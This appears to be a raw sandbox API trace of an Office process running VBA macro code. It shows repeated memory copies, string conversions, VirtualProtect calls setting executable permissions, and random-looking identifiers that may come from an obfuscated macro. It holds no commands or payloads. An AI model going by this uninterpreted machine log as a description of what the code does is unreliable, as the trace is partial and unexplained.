(in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.351] memcpy (in: _Dst=0xcb65188, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.351] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.351] memcpy (in: _Dst=0xcb6518c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.351] memcpy (in: _Dst=0xcb65188, _Src=0x197a08, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.351] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.351] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432ce2, cbMultiByte=7, lpWideCharStr=0x197844, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0100.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b070e, cbMultiByte=7, lpWideCharStr=0x1978a4, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0100.353] CRetailMalloc_Realloc () returned 0xf614c08 [0100.353] CRetailMalloc_Realloc () returned 0xc6f8888 [0100.354] CRetailMalloc_Realloc () returned 0xc908da8 [0100.354] CRetailMalloc_Realloc () returned 0xc6d85a0 [0100.354] CRetailMalloc_Realloc () returned 0xc9bfd28 [0100.354] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.354] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.354] memcpy (in: _Dst=0xcb6518c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.354] memcpy (in: _Dst=0xcb65190, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0100.354] memcpy (in: _Dst=0xcb65194, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0100.355] memcpy (in: _Dst=0xcb65194, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0100.355] CRetailMalloc_Realloc () returned 0xc750ec8 [0100.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb3154d4, cbMultiByte=7, lpWideCharStr=0x11593be4, cchWideChar=16 | out: lpWideCharStr="uXzVdLx") returned 7 [0100.355] memcpy (in: _Dst=0xc736090, _Src=0x11593be0, _Size=0x14 | out: _Dst=0xc736090) returned 0xc736090 [0100.355] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.355] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb3154e6, cbMultiByte=6, lpWideCharStr=0x11593f94, cchWideChar=14 | out: lpWideCharStr="cII3YB") returned 6 [0100.355] memcpy (in: _Dst=0xc7360a8, _Src=0x11593f90, _Size=0x12 | out: _Dst=0xc7360a8) returned 0xc7360a8 [0100.355] memcpy (in: _Dst=0xcb6518c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.356] memcpy (in: _Dst=0xcb6518c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.356] memcpy (in: _Dst=0xcb65190, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0100.357] memcpy (in: _Dst=0xcb65190, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0100.357] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.357] memcpy (in: _Dst=0xcb6518c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.357] memcpy (in: _Dst=0xcb65190, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0100.357] memcpy (in: _Dst=0xcb65194, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0100.357] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.357] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.357] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.357] memcpy (in: _Dst=0xcb6518c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb315544, cbMultiByte=9, lpWideCharStr=0x115a16d4, cchWideChar=20 | out: lpWideCharStr="gYvzmA9m7") returned 9 [0100.358] memcpy (in: _Dst=0xc7360c0, _Src=0x115a16d0, _Size=0x18 | out: _Dst=0xc7360c0) returned 0xc7360c0 [0100.358] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.358] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.358] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.358] memcpy (in: _Dst=0xcb6518c, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.358] memcpy (in: _Dst=0xcb6518c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0732, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0100.358] CRetailMalloc_Alloc () returned 0xc9cd540 [0100.358] wcscpy_s (in: _Destination=0xc9cd554, _SizeInWords=0x7, _Source="Remove" | out: _Destination="Remove") returned 0x0 [0100.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb31556c, cbMultiByte=8, lpWideCharStr=0x115a2248, cchWideChar=18 | out: lpWideCharStr="diAWT0Ux") returned 8 [0100.359] memcpy (in: _Dst=0xc9cd568, _Src=0x115a2244, _Size=0x16 | out: _Dst=0xc9cd568) returned 0xc9cd568 [0100.359] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.359] memcpy (in: _Dst=0xcb65188, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.359] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.359] memcpy (in: _Dst=0xcb6518c, _Src=0x197894, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.359] memcpy (in: _Dst=0xcb6518c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0732, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0100.359] memcpy (in: _Dst=0xcb65188, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.359] memcpy (in: _Dst=0xcb6518c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0100.360] CRetailMalloc_Alloc () returned 0xc9f9e88 [0100.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0100.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0100.364] memcpy (in: _Dst=0xc9cf50c, _Src=0x197ac4, _Size=0x18 | out: _Dst=0xc9cf50c) returned 0xc9cf50c [0100.365] CRetailMalloc_Realloc () returned 0xc9cf2a0 [0100.365] CRetailMalloc_Free () returned 0x1 [0100.365] GetCurrentProcess () returned 0xffffffff [0100.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.365] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.366] GetCurrentProcess () returned 0xffffffff [0100.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.366] GetCurrentProcess () returned 0xffffffff [0100.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.366] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.366] GetCurrentProcess () returned 0xffffffff [0100.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.366] GetCurrentProcess () returned 0xffffffff [0100.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.366] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.367] GetCurrentProcess () returned 0xffffffff [0100.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.367] GetCurrentProcess () returned 0xffffffff [0100.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.367] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.367] GetCurrentProcess () returned 0xffffffff [0100.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.367] GetCurrentProcess () returned 0xffffffff [0100.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.368] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.368] GetCurrentProcess () returned 0xffffffff [0100.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.368] GetCurrentProcess () returned 0xffffffff [0100.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0100.368] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.369] GetCurrentProcess () returned 0xffffffff [0100.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0100.369] GetCurrentProcess () returned 0xffffffff [0100.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0100.369] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.369] GetCurrentProcess () returned 0xffffffff [0100.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0100.369] GetCurrentProcess () returned 0xffffffff [0100.369] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0100.370] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.370] GetCurrentProcess () returned 0xffffffff [0100.370] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0100.370] GetCurrentProcess () returned 0xffffffff [0100.370] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0100.370] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.371] GetCurrentProcess () returned 0xffffffff [0100.371] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0100.371] GetCurrentProcess () returned 0xffffffff [0100.371] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0100.371] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.371] GetCurrentProcess () returned 0xffffffff [0100.371] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0100.371] GetCurrentProcess () returned 0xffffffff [0100.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0100.372] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.372] GetCurrentProcess () returned 0xffffffff [0100.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0100.372] GetCurrentProcess () returned 0xffffffff [0100.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0100.372] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.373] GetCurrentProcess () returned 0xffffffff [0100.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0100.373] GetCurrentProcess () returned 0xffffffff [0100.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0100.373] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.374] GetCurrentProcess () returned 0xffffffff [0100.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0100.374] GetCurrentProcess () returned 0xffffffff [0100.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0100.374] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.374] GetCurrentProcess () returned 0xffffffff [0100.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0100.374] GetCurrentProcess () returned 0xffffffff [0100.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0100.374] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.374] GetCurrentProcess () returned 0xffffffff [0100.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0100.375] GetCurrentProcess () returned 0xffffffff [0100.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0100.375] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.375] GetCurrentProcess () returned 0xffffffff [0100.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0100.375] GetCurrentProcess () returned 0xffffffff [0100.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0100.375] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.375] GetCurrentProcess () returned 0xffffffff [0100.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0100.376] GetCurrentProcess () returned 0xffffffff [0100.376] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0100.376] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.376] GetCurrentProcess () returned 0xffffffff [0100.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0100.377] GetCurrentProcess () returned 0xffffffff [0100.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0100.377] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.377] GetCurrentProcess () returned 0xffffffff [0100.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0100.377] GetCurrentProcess () returned 0xffffffff [0100.377] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0100.377] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.378] GetCurrentProcess () returned 0xffffffff [0100.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0100.378] GetCurrentProcess () returned 0xffffffff [0100.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0100.378] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.378] GetCurrentProcess () returned 0xffffffff [0100.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0100.378] GetCurrentProcess () returned 0xffffffff [0100.378] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0100.378] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.379] GetCurrentProcess () returned 0xffffffff [0100.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0100.379] GetCurrentProcess () returned 0xffffffff [0100.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0100.379] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.379] GetCurrentProcess () returned 0xffffffff [0100.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0100.379] GetCurrentProcess () returned 0xffffffff [0100.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0100.379] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.380] GetCurrentProcess () returned 0xffffffff [0100.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0100.380] GetCurrentProcess () returned 0xffffffff [0100.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0100.380] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.380] GetCurrentProcess () returned 0xffffffff [0100.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0100.380] GetCurrentProcess () returned 0xffffffff [0100.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0100.380] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.381] GetCurrentProcess () returned 0xffffffff [0100.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0100.381] GetCurrentProcess () returned 0xffffffff [0100.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0100.381] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.381] GetCurrentProcess () returned 0xffffffff [0100.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0100.381] GetCurrentProcess () returned 0xffffffff [0100.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0100.381] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.381] GetCurrentProcess () returned 0xffffffff [0100.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0100.382] GetCurrentProcess () returned 0xffffffff [0100.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0100.382] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.382] GetCurrentProcess () returned 0xffffffff [0100.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0100.382] GetCurrentProcess () returned 0xffffffff [0100.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0100.382] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.382] GetCurrentProcess () returned 0xffffffff [0100.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0100.383] GetCurrentProcess () returned 0xffffffff [0100.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0100.383] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0100.383] GetCurrentProcess () returned 0xffffffff [0100.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0100.383] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.426] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0100.426] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0100.426] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.427] GetProcAddress (hModule=0x69130000, lpProcName=0x284) returned 0x69165c5c [0100.427] GetCurrentProcess () returned 0xffffffff [0100.427] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca8d60c, dwSize=0x19) returned 1 [0100.427] VirtualProtect (in: lpAddress=0xca8d60c, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0100.427] GetCurrentProcess () returned 0xffffffff [0100.427] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xca8d668, dwSize=0x19) returned 1 [0100.427] VirtualProtect (in: lpAddress=0xca8d668, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x40) returned 1 [0100.428] GetCurrentProcess () returned 0xffffffff [0100.428] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5fab44, dwSize=0x19) returned 1 [0100.428] VirtualProtect (in: lpAddress=0xf5fab44, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0100.429] GetAsyncKeyState (vKey=3) returned 0 [0100.430] CRetailMalloc_Alloc () returned 0xc9cf580 [0100.430] memcpy (in: _Dst=0xcb65188, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0100.430] memcpy (in: _Dst=0xc9cf5a0, _Src=0x197944, _Size=0x18 | out: _Dst=0xc9cf5a0) returned 0xc9cf5a0 [0100.431] CRetailMalloc_Realloc () returned 0xc9cf580 [0100.431] CRetailMalloc_Free () returned 0x1 [0100.431] GetCurrentProcess () returned 0xffffffff [0100.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0100.431] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.431] GetCurrentProcess () returned 0xffffffff [0100.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0100.431] GetCurrentProcess () returned 0xffffffff [0100.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0100.431] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.432] GetCurrentProcess () returned 0xffffffff [0100.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0100.432] GetCurrentProcess () returned 0xffffffff [0100.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0100.432] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.432] GetCurrentProcess () returned 0xffffffff [0100.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0100.432] GetCurrentProcess () returned 0xffffffff [0100.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0100.432] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.433] GetCurrentProcess () returned 0xffffffff [0100.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0100.433] GetCurrentProcess () returned 0xffffffff [0100.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0100.433] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.433] GetCurrentProcess () returned 0xffffffff [0100.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0100.433] GetCurrentProcess () returned 0xffffffff 